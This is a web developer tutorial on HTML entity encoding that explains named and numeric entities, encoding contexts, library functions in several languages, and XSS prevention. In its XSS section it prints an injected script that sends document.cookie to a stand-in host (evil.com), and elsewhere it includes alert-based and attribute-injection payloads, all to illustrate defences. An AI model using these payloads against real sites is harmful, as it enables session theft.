is inserted into a page without encoding, the browser executes the script. HTML entity encoding converts the < and > characters to &lt; and &gt;, so the browser displays the text literally instead of executing it as code. This neutralizes the attack while preserving the visible content." } }, { "@type": "Question", "name": "Which HTML characters must always be encoded?", "acceptedAnswer": { "@type": "Answer", "text": "Five characters must always be encoded in HTML content: the ampersand (&) as &amp;, the less-than sign (<) as &lt;, the greater-than sign (>) as &gt;, the double quote (\") as &quot; (inside attribute values), and the single quote/apostrophe (') as &#39; or &apos; (inside attribute values). These characters are reserved in HTML syntax and will be misinterpreted if left unencoded." } }, { "@type": "Question", "name": "Is HTML entity encoding the same as URL encoding?", "acceptedAnswer": { "@type": "Answer", "text": "No, they are different encoding schemes for different contexts. HTML entity encoding (e.g., &amp; for &) is used within HTML documents to represent special characters. URL encoding (also called percent-encoding, e.g., %26 for &) is used in URLs to encode characters that have special meaning in the URL syntax. Using the wrong encoding in the wrong context can lead to display errors or security vulnerabilities." } } ] }
HTML entities are special character sequences that represent reserved or non-keyboard characters within HTML documents. Every entity begins with an ampersand (&) and ends with a semicolon (;). Between these delimiters lies either a human-readable name (a named entity) or a numeric code point (a numeric entity) that tells the browser exactly which character to render.
The need for HTML entities arises from a fundamental tension in HTML's design: certain characters serve double duty. The less-than sign (<), for instance, is both a common mathematical symbol and the character that signals the start of every HTML tag. If you write <p> in your source code, the browser interprets it as a paragraph element. But what if you want to display the literal text "<p>" on your page? That is where entities come in -- you write &lt;p&gt;, and the browser renders the angle brackets as visible text instead of parsing them as markup.
HTML entities were part of the very first HTML specification and remain essential in modern web development. The HTML5 specification defines over 2,200 named character references, covering everything from basic punctuation to mathematical symbols, currency signs, arrows, and accented, Greek, and Cyrillic letters. Characters that have no name, such as emojis, are written with numeric references instead. The full list is maintained in the WHATWG HTML Living Standard.
Beyond correctness, HTML entities are a critical component of web security. Properly encoding user-supplied content before inserting it into HTML is the primary defense against Cross-Site Scripting (XSS) attacks -- one of the most prevalent and dangerous classes of web vulnerabilities. Understanding how and when to use HTML entities is a fundamental skill for every web developer.
HTML entity encoding serves two critical purposes: ensuring correct rendering and preventing security vulnerabilities. Let us examine both.
HTML uses certain characters as part of its syntax. The five most important reserved characters are:
- < (less-than) -- starts HTML tags
- > (greater-than) -- ends HTML tags
- & (ampersand) -- starts entity references
- " (double quote) -- delimits attribute values
- ' (single quote / apostrophe) -- delimits attribute values
If you include these characters literally in your HTML content without encoding them, the browser may interpret them as markup rather than display them as text. This leads to broken layouts, missing content, and validation errors. For example, writing if (a<b && c>d) in an HTML document without encoding would cause the browser to parse <b && c> as the start tag of a b element, so part of the expression disappears from the rendered text.
Cross-Site Scripting (XSS) is consistently ranked among the top web application vulnerabilities by OWASP. XSS attacks exploit the failure to properly encode user-supplied data before including it in HTML output. When an application takes user input -- such as a comment, username, or search query -- and inserts it directly into the page without encoding, an attacker can inject arbitrary HTML and JavaScript code.
Consider a simple search page that displays the user's query:
<!-- Vulnerable: unencoded user input -->
<p>You searched for: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script></p>
If the search query is inserted without encoding, the browser executes the injected script, potentially stealing cookies, session tokens, or personal data. With proper HTML entity encoding, the same input becomes harmless:
<!-- Safe: encoded user input -->
<p>You searched for: &lt;script&gt;document.location=&#39;https://evil.com/steal?cookie=&#39;+document.cookie&lt;/script&gt;</p>
The browser displays the script tags as literal text instead of executing them. This is why output encoding is considered a fundamental security control -- it neutralizes injected code by ensuring that user-supplied data is always treated as data, never as code.
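The safe version of the search page can be sketched in Python with the standard library's `html.escape`. The `render_search_result` helper below is hypothetical and only illustrates where the encoding step belongs; it is not taken from any particular framework.

```python
import html


def render_search_result(query: str) -> str:
    """Hypothetical helper: build the results paragraph for a search query."""
    # html.escape converts &, < and >, and by default both quote characters.
    return f"<p>You searched for: {html.escape(query)}</p>"


payload = (
    "<script>document.location='https://evil.com/steal?cookie='"
    "+document.cookie</script>"
)
print(render_search_result(payload))
```

Because the encoding happens inside the function that produces the markup, a caller cannot forget to apply it.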
HTML entities also enable the correct display of characters that may not be available on all keyboards or in all character encodings. While modern web pages almost universally use UTF-8 (which can represent any Unicode character directly), entities remain useful for characters that are difficult to type, visually ambiguous in source code, or need to be explicitly identified for clarity. For instance, the non-breaking space (&nbsp;) is invisible but has distinct behavior from a regular space, and using the entity makes the developer's intent clear.
HTML supports three forms of character references: named entities, decimal numeric entities, and hexadecimal numeric entities. All three produce the same result in the browser, but they differ in readability, coverage, and use cases.
Named entities use a human-readable mnemonic between the & and ; delimiters. They are the most readable form and are preferred when available:
| Character | Named Entity | Description |
|---|---|---|
| & | &amp; | Ampersand |
| < | &lt; | Less-than sign |
| > | &gt; | Greater-than sign |
| " | &quot; | Double quotation mark |
| ' | &apos; | Apostrophe / single quote |
| © | &copy; | Copyright sign |
| ® | &reg; | Registered sign |
| ™ | &trade; | Trademark sign |
| (non-breaking space) | &nbsp; | Non-breaking space |
| — | &mdash; | Em dash |
| – | &ndash; | En dash |
| … | &hellip; | Horizontal ellipsis |
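Named entities are case-sensitive. &eacute; (é) and &Eacute; (É) are different characters, and a miscapitalized name such as &Amp; is not defined at all, although HTML5 does define a few legacy uppercase forms such as &AMP; and &LT;. The HTML5 specification defines over 2,200 named entities, but in practice, most developers use only a handful regularly.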
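Case sensitivity is easy to check against the table of HTML5 names that ships with Python's standard library (`html.entities.html5`). The `lookup` helper is a hypothetical convenience wrapper, shown only as a sketch.

```python
from html.entities import html5  # maps reference names such as "amp;" to characters


def lookup(name: str):
    """Return the character for a named reference like 'amp', or None if undefined."""
    return html5.get(name + ";")


print(lookup("amp"))                       # defined
print(lookup("Amp"))                       # None: this capitalization is not a defined name
print(lookup("eacute"), lookup("Eacute"))  # two different characters
```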
Decimal numeric entities use the format &# followed by the character's Unicode code point in base-10, then ;. They can represent any Unicode character:
&#38; → & (ampersand, U+0026)
&#60; → < (less-than, U+003C)
&#62; → > (greater-than, U+003E)
&#169; → © (copyright, U+00A9)
&#8364; → € (euro sign, U+20AC)
&#9829; → ♥ (heart suit, U+2665)
&#128512; → 😀 (grinning face, U+1F600)
Hexadecimal numeric entities use the format &#x followed by the character's Unicode code point in base-16, then ;. Many developers prefer this format because Unicode code points are conventionally written in hexadecimal (e.g., U+00A9):
&#x26; → & (ampersand)
&#x3C; → < (less-than)
&#x3E; → > (greater-than)
&#xA9; → © (copyright)
&#x20AC; → € (euro sign)
&#x2665; → ♥ (heart suit)
&#x1F600; → 😀 (grinning face)
Use named entities for the five required characters (&amp;, &lt;, &gt;, &quot;, &apos;) and common symbols like &copy; and &nbsp; -- they are the most readable. Use numeric entities for characters that lack a named entity or when you need to specify an exact Unicode code point. Use hexadecimal numeric entities when working closely with Unicode references, as the hex format maps directly to U+XXXX notation.
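As a quick check that the three forms are interchangeable, the Python sketch below decodes one reference of each kind with `html.unescape` and derives both numeric forms from a character's code point. The `numeric_forms` helper is hypothetical.

```python
import html

# One reference of each kind for the copyright sign (U+00A9).
forms = {
    "named": "&copy;",
    "decimal": "&#169;",
    "hexadecimal": "&#xA9;",
}
decoded = {kind: html.unescape(ref) for kind, ref in forms.items()}
print(decoded)  # every value is the same character


def numeric_forms(ch: str):
    """Return the (decimal, hexadecimal) references for a single character."""
    code_point = ord(ch)
    return f"&#{code_point};", f"&#x{code_point:X};"


print(numeric_forms("€"))
```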
While there are thousands of HTML entities, five characters are critical because they are reserved in HTML syntax. Failing to encode any of these when they appear in content or attributes can break your page or create security vulnerabilities.
&amp;
The ampersand initiates every entity reference in HTML. If you write a literal & in your content, the browser's parser attempts to interpret what follows as an entity name. This can cause incorrect rendering or HTML validation errors. Always encode ampersands in URLs within HTML attributes:
<!-- Wrong: unencoded ampersand in URL -->
<a href="/search?q=cats&sort=date">Search</a>
<!-- Correct: encoded ampersand -->
<a href="/search?q=cats&amp;sort=date">Search</a>
&lt;
The less-than sign marks the beginning of an HTML tag. Any unencoded < in your content will cause the parser to attempt to interpret the following text as a tag name. This is the character most commonly exploited in XSS attacks, as it allows attackers to inject <script> tags.
&gt;
The greater-than sign closes HTML tags. While browsers are generally more forgiving about unencoded > in content (since it only has meaning after an opening <), it should still be encoded for correctness, consistency, and to prevent edge-case parsing issues.
&quot;
Double quotes delimit most HTML attribute values. An unencoded double quote inside a double-quoted attribute value will prematurely terminate the attribute, potentially allowing an attacker to inject additional attributes or event handlers:
<!-- Vulnerable: unencoded quotes allow attribute injection -->
<input value="USER_INPUT" />
<!-- If USER_INPUT is: " onfocus="alert('XSS') -->
<!-- Result: -->
<input value="" onfocus="alert('XSS')" />
<!-- Safe: encoded quotes -->
<input value="&quot; onfocus=&quot;alert(&#39;XSS&#39;)" />
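The attribute case can be sketched in Python as follows. The `render_input` helper is hypothetical; it relies on `html.escape` with `quote=True`, which encodes both quote characters (the single quote is emitted as `&#x27;`).

```python
import html


def render_input(value: str) -> str:
    """Hypothetical helper: place untrusted text in a double-quoted attribute."""
    return f'<input value="{html.escape(value, quote=True)}" />'


attack = '" onfocus="alert(\'XSS\')'
print(render_input(attack))
```

The output contains exactly two literal double quotes, the ones that delimit the attribute, so the injected text cannot close the value early.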
&#39; or &apos;
Single quotes can also delimit attribute values in HTML. While &apos; was historically not defined in HTML4 (only in XHTML and XML), it is fully supported in HTML5. For maximum compatibility, many developers prefer &#39;. Either form is safe.
Cross-Site Scripting (XSS) remains one of the most widespread and dangerous web vulnerabilities. According to the OWASP Top 10 (2017 edition), XSS vulnerabilities are found in approximately two-thirds of all applications. HTML entity encoding is the primary defense against reflected and stored XSS attacks.
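XSS attacks exploit the fact that browsers cannot distinguish between legitimate markup written by the developer and malicious markup injected by an attacker -- unless the application properly encodes all dynamic content. There are three main types:
- Reflected XSS: the payload arrives in the request (for example, in a URL parameter) and is echoed straight back in the response.
- Stored XSS: the payload is saved by the application (for example, in a comment) and served to every user who views it.
- DOM-based XSS: client-side JavaScript writes untrusted data into the page, so the injection happens in the browser rather than in the server's response.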
The principle is simple: encode all untrusted data before inserting it into HTML. "Untrusted data" includes anything that originates outside your application's codebase -- user input, URL parameters, database values, API responses, cookie values, and HTTP headers.
At minimum, encode the five critical characters:
Character   Entity    Purpose
---------   ------    -------
&           &amp;     Prevents entity injection
<           &lt;      Prevents tag injection
>           &gt;      Prevents tag closure injection
"           &quot;    Prevents attribute breakout
'           &#39;     Prevents attribute breakout
A critical concept in XSS prevention is that the correct encoding depends on where in the HTML document the untrusted data is being inserted. HTML entity encoding is correct for:
- HTML element content: <p>ENCODED_DATA</p>
- Quoted HTML attribute values: <div title="ENCODED_DATA">
However, HTML entity encoding is NOT sufficient for:
- JavaScript contexts (use JavaScript encoding, e.g., \x3C for <)
- CSS contexts (use CSS encoding, e.g., \003C for <)
- URL contexts (use URL encoding, e.g., %3C for <)
Using the wrong encoding for the wrong context is a common mistake that leaves applications vulnerable even when developers believe they have protected against XSS. The OWASP XSS Prevention Cheat Sheet provides comprehensive guidance on context-sensitive output encoding.
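To make the context rule concrete, here is a minimal Python sketch with one encoder per context. All three function names are hypothetical. The JavaScript variant is an assumption built on `json.dumps` plus extra escaping of `<`, `>` and `&`, and it is not a substitute for a vetted encoder library.

```python
import html
import json
from urllib.parse import quote


def for_html(value: str) -> str:
    """Element content and quoted attribute values."""
    return html.escape(value, quote=True)


def for_url_component(value: str) -> str:
    """A single query-string value or path segment (percent-encoding)."""
    return quote(value, safe="")


def for_js_string(value: str) -> str:
    """A quoted JavaScript string literal for use inside a script block."""
    literal = json.dumps(value)
    # Escape <, > and & so sequences like </script> cannot end the script block.
    return (
        literal.replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


value = "</script>"
print(for_html(value))
print(for_url_component(value))
print(for_js_string(value))
```

The same input yields three different encodings, which is why a single "escape everything once" step cannot be correct for every destination.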
While HTML entity encoding is the primary defense, a robust security posture includes multiple layers, such as template auto-escaping and HTML sanitization for rich-text input.
Modern HTML pages use UTF-8 encoding, which can represent every character in the Unicode standard directly. This means you can include characters from any language, mathematical symbols, currency signs, and even emojis by simply typing them into your source code -- as long as your file is saved with UTF-8 encoding and the page declares <meta charset="UTF-8">.
However, HTML entities remain valuable for special characters in several scenarios:
| Category | Character | Entity | Description |
|---|---|---|---|
| Spaces | (non-breaking space) | &nbsp; | Non-breaking space |
| Spaces | (en space) | &ensp; | En space |
| Spaces | (em space) | &emsp; | Em space |
| Dashes | – | &ndash; | En dash |
| Dashes | — | &mdash; | Em dash |
| Quotes | ‘ | &lsquo; | Left single quote |
| Quotes | ’ | &rsquo; | Right single quote |
| Quotes | “ | &ldquo; | Left double quote |
| Quotes | ” | &rdquo; | Right double quote |
| Currency | € | &euro; | Euro sign |
| Currency | £ | &pound; | Pound sign |
| Currency | ¥ | &yen; | Yen sign |
| Math | × | &times; | Multiplication sign |
| Math | ÷ | &divide; | Division sign |
| Math | ≠ | &ne; | Not equal to |
| Math | ≤ | &le; | Less than or equal |
| Math | ≥ | &ge; | Greater than or equal |
| Arrows | ← | &larr; | Left arrow |
| Arrows | → | &rarr; | Right arrow |
The non-breaking space (&nbsp;) is perhaps the most commonly used HTML entity. Unlike a regular space, a non-breaking space prevents the browser from breaking a line at that position. It is useful for:
- Keeping a number and its unit together: 100&nbsp;km
- Keeping a title and a name together: Dr.&nbsp;Smith
However, overusing &nbsp; for layout purposes is an anti-pattern. Use CSS margin, padding, or white-space properties for spacing and layout control.
Unicode characters above U+FFFF (such as emojis and historic scripts) can be represented using numeric entities with their full code point value:
&#x1F600; → 😀 (grinning face)
&#x1F4BB; → 💻 (laptop)
&#x1F680; → 🚀 (rocket)
&#x1F512; → 🔒 (lock)
&#128512; → 😀 (same grinning face, decimal form)
While you can include these characters directly in UTF-8 source files, entities are useful when your editor or toolchain has trouble displaying or preserving them.
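For a toolchain that cannot preserve such characters, the conversion to numeric entities can be sketched in Python. The `to_numeric_entities` helper is hypothetical and only rewrites non-ASCII characters; it does not encode reserved characters such as < or &, which still need normal HTML encoding.

```python
def to_numeric_entities(text: str, hexadecimal: bool = True) -> str:
    """Replace every non-ASCII character with a numeric character reference."""
    pieces = []
    for ch in text:
        code_point = ord(ch)
        if code_point < 128:
            pieces.append(ch)  # plain ASCII stays as typed
        elif hexadecimal:
            pieces.append(f"&#x{code_point:X};")
        else:
            pieces.append(f"&#{code_point};")
    return "".join(pieces)


print(to_numeric_entities("Launch 🚀"))
# The standard library offers the decimal form through an encoding error handler:
print("Launch 🚀".encode("ascii", "xmlcharrefreplace").decode("ascii"))
```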
A common source of confusion is the distinction between HTML entity encoding and other forms of encoding used in web development. Each encoding scheme is designed for a specific context, and using the wrong one can lead to display errors or security vulnerabilities.
HTML entity encoding and URL encoding (percent-encoding) serve different purposes and must not be confused:
| Feature | HTML Entity Encoding | URL Encoding |
|---|---|---|
| Context | HTML documents | URLs and query strings |
| Format | &name; or &#num; | %XX (hex byte) |
| Ampersand | &amp; | %26 |
| Less-than | &lt; | %3C |
| Space | &nbsp; (non-breaking) | %20 or + |
| Specification | HTML Living Standard | RFC 3986 |
When placing a URL inside an HTML attribute, you may need both encodings. First, URL-encode the query parameters, then HTML-encode the entire URL for the attribute:
<!-- Step 1: URL-encode query parameters -->
https://example.com/search?q=cats%20%26%20dogs&page=1
<!-- Step 2: HTML-encode the URL for the href attribute -->
<a href="https://example.com/search?q=cats%20%26%20dogs&amp;page=1">Search</a>
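The two steps can be sketched in Python with `urllib.parse.urlencode` and `html.escape`. The `search_link` helper is hypothetical, and `quote_via=quote` is passed so that spaces become %20 rather than +, matching the URL shown here.

```python
import html
from urllib.parse import quote, urlencode


def search_link(query: str, page: int) -> str:
    """Hypothetical helper: build a search link from untrusted parameters."""
    # Step 1: percent-encode each query parameter value.
    query_string = urlencode({"q": query, "page": page}, quote_via=quote)
    url = f"https://example.com/search?{query_string}"
    # Step 2: HTML-encode the complete URL for the href attribute.
    return f'<a href="{html.escape(url, quote=True)}">Search</a>'


print(search_link("cats & dogs", 1))
```

The ampersand inside the search term ends up as %26, while the ampersand that separates the parameters ends up as &amp;amp; in the markup.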
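When inserting dynamic data into inline JavaScript, HTML entity encoding is not sufficient. In event-handler attributes such as onclick, the browser decodes HTML entities before passing the content to the JavaScript engine, which means an attacker can still inject code. Inside a <script> block, entities are not decoded at all, so entity-encoded data reaches the script in altered form while characters that matter to JavaScript, such as backslashes and line breaks, are left untouched. Use JavaScript-specific encoding (e.g., \x3C for <) or, better yet, avoid inline scripts entirely and pass data through data attributes: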
<!-- Avoid: inline JavaScript with dynamic data -->
<script>var name = "USER_INPUT";</script>
<!-- Better: use data attributes -->
<div id="app" data-name="ENCODED_USER_INPUT"></div>
<script>
var name = document.getElementById('app').dataset.name;
</script>
CSS has its own encoding scheme that uses backslashes followed by hexadecimal code points (e.g., \003C for <). This is relevant when untrusted data is inserted into CSS values, such as in style attributes or dynamically generated stylesheets. Again, the best approach is to avoid inserting dynamic data into CSS contexts entirely.
Every major programming language and web framework provides built-in functions for HTML entity encoding. Always use these library functions rather than writing your own encoding logic -- hand-rolled encoding is error-prone and likely to miss edge cases.
The browser DOM provides a built-in mechanism for safe HTML encoding through the textContent property:
// Safe: Using textContent (the string is inserted as text, never parsed as markup)
const element = document.getElementById('output'); // assumes an element with id="output" exists
const userInput = '<script>alert("XSS")</script>';
element.textContent = userInput;
// Renders as literal text, not as a script
// Manual encoding function
function encodeHTML(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
// Decoding HTML entities
function decodeHTML(str) {
  const textarea = document.createElement('textarea');
  textarea.innerHTML = str;
  return textarea.value;
}
// UNSAFE: Never use innerHTML with untrusted data
element.innerHTML = userInput; // XSS vulnerability!
Note the order of replacements: the ampersand must be encoded first. Otherwise the ampersands introduced by the other replacements would themselves be encoded (e.g., &lt; would become &amp;lt;).
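The ordering rule applies in any language. The short Python sketch below uses two hypothetical functions that differ only in when the ampersand is replaced, which makes the difference visible.

```python
def encode_ampersand_first(text: str) -> str:
    """Correct order: ampersands are replaced before any entity is introduced."""
    return text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")


def encode_ampersand_last(text: str) -> str:
    """Wrong order: the & in the freshly written &lt; and &gt; gets encoded again."""
    return text.replace("<", "&lt;").replace(">", "&gt;").replace("&", "&amp;")


sample = "a < b"
print(encode_ampersand_first(sample))
print(encode_ampersand_last(sample))
```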
Python's standard library provides the html module for encoding and decoding:
import html
# Encoding (escaping)
text = '<script>alert("XSS")</script>'
safe = html.escape(text)
print(safe)
# &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
# By default (quote=True), html.escape() also encodes " as &quot; and ' as &#x27;
# Pass quote=False only for text that will never be placed in an attribute value
content_only = html.escape(text, quote=False)
# Decoding (unescaping)
original = html.unescape('&lt;p&gt;Hello &amp; welcome&lt;/p&gt;')
print(original)
# <p>Hello & welcome</p>
# In web frameworks:
# Django: {{ variable }} auto-escapes by default
# Flask: {{ variable }} auto-escapes by default in .html templates
# (plain Jinja2 requires autoescape to be enabled on the Environment)
# Use {{ variable|safe }} ONLY for trusted HTML content
PHP provides two main functions for HTML encoding:
// htmlspecialchars: encodes the 5 critical characters
$input = '<script>alert("XSS")</script>';
$safe = htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
// htmlentities: encodes ALL characters that have entity equivalents
$text = 'Price: 50€ © 2026';
$encoded = htmlentities($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// € becomes &euro; and © becomes &copy;
// Always specify ENT_QUOTES to encode both single and double quotes
// Always specify UTF-8 as the character encoding
// Decoding
$original = html_entity_decode($encoded, ENT_QUOTES | ENT_HTML5, 'UTF-8');
$original = htmlspecialchars_decode($safe, ENT_QUOTES);
Java's standard library does not include an HTML encoding method, but Apache Commons Text and the OWASP Java Encoder provide robust implementations:
// Apache Commons Text
import org.apache.commons.text.StringEscapeUtils;
String input = "<script>alert('XSS')</script>";
String safe = StringEscapeUtils.escapeHtml4(input);
// &lt;script&gt;alert('XSS')&lt;/script&gt; (escapeHtml4 leaves single quotes unescaped)
String original = StringEscapeUtils.unescapeHtml4(safe);
// OWASP Java Encoder (recommended for security)
import org.owasp.encoder.Encode;
String safeHtml = Encode.forHtmlContent(input);
String safeAttr = Encode.forHtmlAttribute(input);
String safeJs = Encode.forJavaScript(input);
String safeUrl = Encode.forUriComponent(input);
Go's html package provides basic encoding, and html/template provides context-aware auto-escaping:
package main
import (
	"fmt"
	"html"
)
func main() {
	input := `<script>alert("XSS")</script>`
	// Encoding
	safe := html.EscapeString(input)
	fmt.Println(safe)
	// &lt;script&gt;alert(&#34;XSS&#34;)&lt;/script&gt;
	// Decoding
	original := html.UnescapeString(safe)
	fmt.Println(original)
	// <script>alert("XSS")</script>
}
// In templates, html/template auto-escapes contextually:
// {{.UserInput}} is automatically escaped in HTML context
// Use template.HTML(trustedString) to mark content as safe
.NET provides System.Net.WebUtility and System.Web.HttpUtility for HTML encoding:
using System.Net;
string input = "<script>alert('XSS')</script>";
string safe = WebUtility.HtmlEncode(input);
// &lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;
string original = WebUtility.HtmlDecode(safe);
// In Razor views, @ automatically HTML-encodes:
// @Model.UserInput is safe
// @Html.Raw(Model.TrustedHtml) bypasses encoding -- use with caution
Even experienced developers make encoding mistakes. Here are the most common pitfalls and how to avoid them.
Double encoding occurs when data that has already been encoded is encoded again. The result is that the entity markup itself appears in the rendered output instead of the intended character:
&amp;amp; → displays as "&amp;" instead of "&"
&amp;lt; → displays as "&lt;" instead of "<"
This happens when encoding is applied at multiple layers -- for example, once in the application code and again in the template engine. To avoid it, establish a clear encoding boundary: encode at the point of output (in the template), and ensure that the template engine is not also auto-encoding the same data.
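Double encoding is easy to reproduce with Python's `html.escape`. The sketch below encodes the same string at two layers and then decodes once, which is effectively what the browser does when it renders the page.

```python
import html

raw = "Tom & Jerry <3"
once = html.escape(raw)    # encoded at the output boundary (intended)
twice = html.escape(once)  # encoded again by a second layer (the bug)

print(once)
print(twice)
# The browser decodes only once, so the visitor sees the entity markup itself:
print(html.unescape(twice))
```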
URLs within HTML attributes commonly contain ampersands as query parameter separators. These must be encoded as &amp; even though they are inside an attribute value:
<!-- Invalid HTML -->
<a href="/page?a=1&b=2&c=3">Link</a>
<!-- Valid HTML -->
<a href="/page?a=1&amp;b=2&amp;c=3">Link</a>
Browsers are forgiving about this and typically handle it correctly, but it is technically invalid HTML and can cause issues with validators and in edge cases where the text after & happens to match an entity name.
As discussed in the encoding contexts section, HTML entity encoding is only appropriate for HTML contexts. Using it in JavaScript, CSS, or URL contexts provides no security protection and may introduce vulnerabilities. Always match your encoding strategy to the output context.
A dangerous anti-pattern is filtering or sanitizing input on its way in, rather than encoding output on its way out. Input filtering is fragile -- attackers constantly find new encoding tricks, Unicode normalization exploits, and filter bypass techniques. Output encoding is robust because it applies the correct transformation at the exact point where the data transitions from a data context to a code context. Always encode at the point of output.
Many encoding functions only encode double quotes by default and skip single quotes. If your HTML uses single-quoted attribute values, or if an attacker can inject a single quote to break out of a context, this omission creates a vulnerability. Always ensure your encoding function handles both quote types.
innerHTML with Untrusted Data
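In JavaScript, setting innerHTML on a DOM element parses the string as HTML. Although <script> elements inserted this way do not run, event-handler attributes such as onerror on an <img> element do, so injected markup can still execute code. Never use innerHTML with untrusted data. Use textContent for plain text, or use a sanitization library like DOMPurify if you must insert HTML: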
// UNSAFE
element.innerHTML = userInput;
// SAFE: plain text
element.textContent = userInput;
// SAFE: sanitized HTML (using DOMPurify)
element.innerHTML = DOMPurify.sanitize(userInput);
Follow these guidelines to handle HTML entities correctly and maintain secure, well-formed HTML documents.
The most important principle in HTML encoding is to encode data at the point of output -- when it is being inserted into the HTML document. Do not rely on encoding or sanitizing data at the point of input. Data may be used in multiple contexts (HTML, JavaScript, SQL, URLs), and each context requires a different encoding. Encode when you render, not when you receive.
Modern web frameworks and template engines auto-escape HTML by default. Django, Jinja2 (as configured by Flask), React (JSX), Angular, Vue.js, Go's html/template, and Razor all encode output automatically. Do not disable auto-escaping unless you have a specific need to output trusted HTML, and even then, sanitize it first.
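At minimum, always encode &, <, >, ", and '. These five characters are sufficient to prevent XSS in HTML content and quoted attribute contexts. Unquoted attribute values can be broken out of with spaces and other characters, so always quote attributes. For extra safety, consider encoding all non-alphanumeric characters as numeric entities.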
Declare <meta charset="UTF-8"> in every HTML page, save source files in UTF-8, and ensure your server sends the Content-Type: text/html; charset=utf-8 header. With UTF-8, you can include most characters directly without entities, reducing the need for encoding and simplifying your source code.
Use the W3C Markup Validation Service to check your HTML for encoding errors. Common issues include unencoded ampersands in URLs, unencoded special characters in content, and invalid entity names. Valid HTML is more predictable and less likely to have rendering or security issues.
When you need to use an entity, prefer the named form when it exists. &amp; is more readable than &#38;, &copy; is clearer than &#169;, and &mdash; is more meaningful than &#8212;. Readable source code is easier to review, maintain, and audit for security issues.
HTML entity encoding prevents browsers from interpreting characters as markup, but it does not sanitize HTML. If you need to accept and display user-supplied HTML (e.g., rich text from a WYSIWYG editor), use a dedicated HTML sanitization library like DOMPurify (JavaScript), Bleach (Python), or HtmlSanitizer (.NET). These libraries parse the HTML and remove dangerous elements and attributes while preserving safe formatting.
Test your application with known XSS payloads to verify that your encoding is working correctly. The OWASP XSS Filter Evasion Cheat Sheet provides an extensive collection of test vectors. Automated security scanning tools like OWASP ZAP can also detect encoding failures.
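A payload check can start as small as the Python sketch below. The payload list is illustrative only and is not taken from the OWASP cheat sheet, and `encode` and `check_payloads` are hypothetical names. In a real project, `encode` would be replaced by a call into the application's own rendering path.

```python
import html
import re

# Illustrative payloads; extend the list with vectors relevant to your application.
PAYLOADS = [
    '<script>alert("XSS")</script>',
    '"><img src=x onerror=alert(1)>',
    "' onmouseover='alert(1)",
    "<svg/onload=alert(1)>",
]

# Characters that must never survive encoding in HTML content or attributes.
UNSAFE = re.compile(r"[<>\"']")


def encode(value: str) -> str:
    """Encoder under test (stand-in for the application's output encoding)."""
    return html.escape(value, quote=True)


def check_payloads(encoder) -> list:
    """Return the payloads that the encoder fails to neutralize or corrupts."""
    failures = []
    for payload in PAYLOADS:
        encoded = encoder(payload)
        # Fail if a raw reserved character remains or the text does not round-trip.
        if UNSAFE.search(encoded) or html.unescape(encoded) != payload:
            failures.append(payload)
    return failures


print(check_payloads(encode))
```

An empty list means every payload was neutralized and still decodes back to the original text. Passing an encoder that skips quotes, for example one that calls `html.escape` with `quote=False`, makes the quote-based payloads show up as failures.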
Our free HTML Entity Encoder & Decoder tool makes it easy to encode and decode HTML entities directly in your browser. No data is sent to any server -- all processing happens locally on your machine.
Paste any text containing special characters, and instantly get the HTML-encoded output. The tool encodes all five critical characters (&, <, >, ", ') and optionally encodes all non-ASCII characters as numeric entities. You can choose between named entities and numeric entities (decimal or hexadecimal).
Paste HTML-encoded text and see the decoded output immediately. The tool handles named entities, decimal numeric entities, and hexadecimal numeric entities. Invalid entities are highlighted with clear error messages.